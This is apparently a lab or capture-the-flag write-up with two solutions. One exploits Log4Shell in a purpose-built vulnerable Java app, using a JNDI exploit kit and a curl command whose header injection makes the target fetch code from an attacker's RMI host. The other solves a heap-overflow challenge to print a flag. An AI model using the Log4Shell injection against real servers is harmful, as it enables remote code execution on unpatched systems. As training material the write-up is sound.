Solutions and instructions to reproduce of provided tasks.
This guide outlines the steps to exploit a remote code execution vulnerability in a Java web application using the log4shell (CVE-2021-44228) vulnerability.
The task involves exploiting a vulnerability in the application's log4j library to execute remote code on the target system.
- Operating System: Ubuntu 22.04.3 LTS
- Java Runtime Environment (JRE) version 8
- JNDI Injection Exploit Kit for RCE exploit (https://github.com/welk1n/JNDI-Injection-Exploit) -> mvn to build (optional)
- Target system: Windows 11
The solution exploits the log4shell vulnerability by injecting a malicious payload via the "x-log" header, leading to remote code execution on the target system.
- Start the Vulnerable Application: Launch the vulnerable web application (
vulnapp.jar) on the target system.
java -jar vulnapp.jar
- Prepare the Exploit Kit: Build and launch the JNDI Injection Exploit Kit on the attacker host with the desired payload (e.g.,
calc.exefor Windows).
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'calc.exe'
-
Craft the Payload: Construct the payload to be injected through the "x-log" header, leveraging the JNDI Injection Exploit Kit's capabilities.
-
Trigger the Exploit: Send the crafted payload to the vulnerable application via curl or similar tools, exploiting the log4shell vulnerability.
curl http://<IP-ADDRESS>:8888/app/servlet -H 'x-log: ${jndi:rmi://<WSL-IP>:1099/<RMI lookup value as provided by Injection Exploit>}'
- Verify Remote Code Execution: Upon successful exploitation, the payload should execute on the target system, demonstrating remote code execution.
The challenge involved a binary with a vulnerability in the way it handled heap-allocated variables. The objective was to manipulate the heap to overwrite a specific variable (safe_var) with the string "ACMR". Upon success, the program would display the contents of "flag.txt".
Operating system: Ubuntu 22.04.3 LTS
The solution involved a carefully crafted input to a buffer (input_data) that when written to, would overflow and overwrite the adjacent safe_var on the heap.
The heap contained two variables of interest:
input_data: A buffer allocated 5 bytes on the heap.safe_var: A variable stored directly afterinput_dataon the heap, checked by the program to print the flag.
Through analysis, it was clear that writing 32 characters to input_data followed by "ACMR" would overflow and fill safe_var with the desired string.
-
Start the Program: The binary was executed, and the initial heap state was observed.
-
Craft the Payload: A string of 32 "X" characters followed by "ACMR" was prepared as the payload to overflow
input_dataand overwritesafe_var. -
Execute the Overflow: The crafted payload was entered into the program via the "Write to buffer" option.
-
Check Heap State: After the payload was written to the heap, the new heap state was examined to ensure
safe_varnow contained "ACMR". -
Print the Flag: The option to print the flag was selected, which successfully displayed the contents of the flag due to the correct value in
safe_var.
Using the payload XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXACMR, the heap overflow was successful, and the flag acm_ftw was printed as expected.
- Decompilation software (e.g., Ghidra, IDA Pro) for analyzing the binary.
- A text editor to craft the payload.
- Terminal to interact with the binary program.
This challenge was an excellent demonstration of a heap overflow vulnerability and underscored the importance of bounds checking in programs. It also showed the power of manual analysis in understanding and manipulating memory in a controlled manner.